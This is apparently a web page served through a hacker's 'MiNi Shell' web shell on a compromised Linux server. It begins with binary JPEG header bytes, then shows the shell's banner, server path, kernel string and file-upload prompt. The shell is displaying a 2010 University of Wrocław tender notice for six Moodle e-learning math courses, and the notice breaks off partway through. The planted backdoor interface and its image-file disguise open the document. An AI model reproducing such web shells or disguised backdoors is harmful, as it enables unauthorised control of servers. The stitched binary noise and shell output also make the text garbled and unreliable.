JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100423/95545-N-2010.html

<p class="kh_header"><b>Wrocław: Przeprowadzenie kursów dla studentów oraz szkoleń dla pracowników związanych 
z realizacją projektu: Zamawianie kształcenia na kierunkach technicznych, matematycznych i przyrodniczych - pilotaż- poddziałanie 4.1.2 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Przygotowanie zajęć w postaci e-learningu w 2010 r</b><br>
<b>Numer ogłoszenia: 95545 - 2010; data zamieszczenia: 23.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wydział Matematyki i Informatyki Uniwersytetu Wrocławskiego , pl. Grunwaldzki 2/4, 50-384 Wrocław, woj. dolnośląskie, tel. 071 3757401, faks 071 3757429.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.math.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów dla studentów oraz szkoleń dla pracowników związanych 
z realizacją projektu: Zamawianie kształcenia na kierunkach technicznych, matematycznych i przyrodniczych - pilotaż- poddziałanie 4.1.2 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Przygotowanie zajęć w postaci e-learningu w 2010 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursów dla studentów oraz szkoleń dla pracowników związanych 
z realizacją projektu: Zamawianie kształcenia na kierunkach technicznych, matematycznych i przyrodniczych - pilotaż - poddziałanie 4.1.2 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Przygotowanie zajęć w postaci e-learningu w 2010 r.
Zamawiający dopuszcza składanie ofert częściowych: liczba części - 6.
część 1.	Przygotowanie zajęć w postaci e-learningu- Analiza portfelowa
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Analizy portfelowej (30 godzin zajęć) w formie e-learningu dla studentów II i III roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.
część 2.	Przygotowanie zajęć w postaci e-learningu:Rachunek Prawdopodobieństwa 1A
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Rachunek Prawdopodobieństwa A1 (30 godzin zajęć) w formie e-learningu dla studentów II i III roku studiów dziennych Matematyki Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.
część 3.	Przygotowanie zajęć w postaci e-learningu - Rachunek Prawdopodobieństwa B1
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Rachunek Prawdopodobieństwa B1 (30 godzin zajęć) w formie e-learningu dla studentów II i III roku studiów dziennych Matematyki Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.
część 4.	Przygotowanie zajęć w postaci e-learningu -Ekonometria 1
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Ekonometria (30 godzin zajęć) w formie e-learningu dla studentów III i IV roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.
część 5.	Przygotowanie zajęć w postaci e-learningu - Pracownia statystyczna 1
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Pracownia Statystyczna 1 (30 godzin zajęć) w formie e-learningu dla studentów IV roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.
część 6.	Przygotowanie zajęć w postaci e-learningu: Visual Basic w Excelu
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Visual Basic w Excelu (30 godzin zajęć) w formie e-learningu dla studentów III i IV roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy przedstawiają CV w którym prezentują swoje wykształcenie, wiedzę i doświadczenie. Wykonawcy winni dysponować dokumentami (np. certyfikaty, świadectwa, zaświadczenia, dyplomy itp.), które potwierdzają ich kwalifikacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy przedstawiają CV w którym prezentują swoje wykształcenie, wiedzę i doświadczenie. Wykonawcy winni dysponować dokumentami (np. certyfikaty, świadectwa, zaświadczenia, dyplomy itp.), które potwierdzają ich kwalifikacje. Ponadto każdy Wykonawca musi mieć doświadczenie praktyczne w zakresie przygotowywania zajęć w formie e-learningowej w systemie Moodle.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaaprobowany i podpisany wzór umowy (załącznik nr 2do SIWZ) oraz:
ofertę składającą się z : 
a. CV ze szczególnym uwzględnieniem udokumentowania posiadania wiedzy i doświadczenia w prowadzeniu kursów z Matematyki na poziomie wyższym dla części 1 z Analizy Portfelowej, dla części 2 i 3 z Rachunku Prawdopodobieństwa, dla części 4 z Ekonometrii, dla części 5 ze Statystyki, dla części 6 z Visual Basic w Excelu, oraz wiedzy i doświadczenia w tworzeniu kursów e-learningu w systemie Moodle.
b. określenie ceny ofertowej za całość zamówienia lub jej część w przypadku złożenia oferty częściowej. Sposób obliczenia ceny ofertowej znajduje się w rozdziale VIII SIWZ.
c. adresu strony internetowej na której umieszczony jest już wcześniej zrealizowany przez Wykonawcę kurs e-learningu w systemie Moodle lub fragment (próbka) kursu, lub inne materiały pozwalające ocenić umiejętności tworzenia kursów e-learningowych w systemie Moodle (wraz z hasłem lub opisem dostępu do materiałów jeśli dostęp ten jest ograniczony).
d. listu(ów) referencyjnego(ych) samodzielnych pracowników naukowych z dziedziny matematyki aplikacyjnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - wiedza i doświadczenie związane z przygotowaniem i przeprowadzeniem zajęć z zakresu Matematyki na poziomie wyższym ze szczególnym uwzględnieniem temat - 35</li>
<li>3 - wiedza, doświadczenie oraz praktyczne umiejętności związane z pisaniem programów z dziedziny e-learningu w systemie Moodle - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bzp.uni.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Matematyczny Uniwersytetu Wrocławskiego
pl. Grunwaldzki 2/4; 50-384 Wroclaw pokój 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2010 godzina 09:00, miejsce: Instytut Matematyczny Uniwersytetu Wrocławskiego
pl. Grunwaldzki 2/4; 50-384 Wroclaw pokój 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługi współfinansowane są ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - projekt:Zamawianie kształcenia na kierunkach technicznych, matematycznych i przyrodniczych - pilotaż- poddziałanie 4.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie zajęć w postaci e-learningu: Analiza portfelowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie zajęć w postaci e-learningu: Analiza portfelowa.
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Analizy portfelowej (30 godzin zajęć) w formie e-learningu dla studentów II i III roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. wiedza i doświadczenie związane z przygotowaniem i przeprowadzeniem zajęć z zakresu Matematyki na poziomie wyższym ze szczególnym uwzględnieniem temat - 35</li>
<li>3. wiedza, doświadczenie oraz praktyczne umiejętności związane z pisaniem programów z dziedziny e-learningu w systemie Moodle - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie zajęć w postaci e-learningu : Rachunek Prawdopodobieństwa 1A..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie zajęć w postaci e-learningu : Rachunek Prawdopodobieństwa 1A.
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Rachunek Prawdopodobieństwa A1 (30 godzin zajęć) w formie e-learningu dla studentów II i III roku studiów dziennych Matematyki Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. wiedza i doświadczenie związane z przygotowaniem i przeprowadzeniem zajęć z zakresu Matematyki na poziomie wyższym ze szczególnym uwzględnieniem temat - 35</li>
<li>3. wiedza, doświadczenie oraz praktyczne umiejętności związane z pisaniem programów z dziedziny e-learningu w systemie Moodle - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie zajęć w postaci e-learningu: Rachunek Prawdopodobieństwa B1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie zajęć w postaci e-learningu: Rachunek Prawdopodobieństwa B1.
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Rachunek Prawdopodobieństwa B1 (30 godzin zajęć) w formie e-learningu dla studentów II i III roku studiów dziennych Matematyki Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. wiedza i doświadczenie związane z przygotowaniem i przeprowadzeniem zajęć z zakresu Matematyki na poziomie wyższym ze szczególnym uwzględnieniem temat - 35</li>
<li>3. wiedza, doświadczenie oraz praktyczne umiejętności związane z pisaniem programów z dziedziny e-learningu w systemie Moodle - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie zajęć w postaci e-learningu: Ekonometria 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie zajęć w postaci e-learningu: Ekonometria 1.
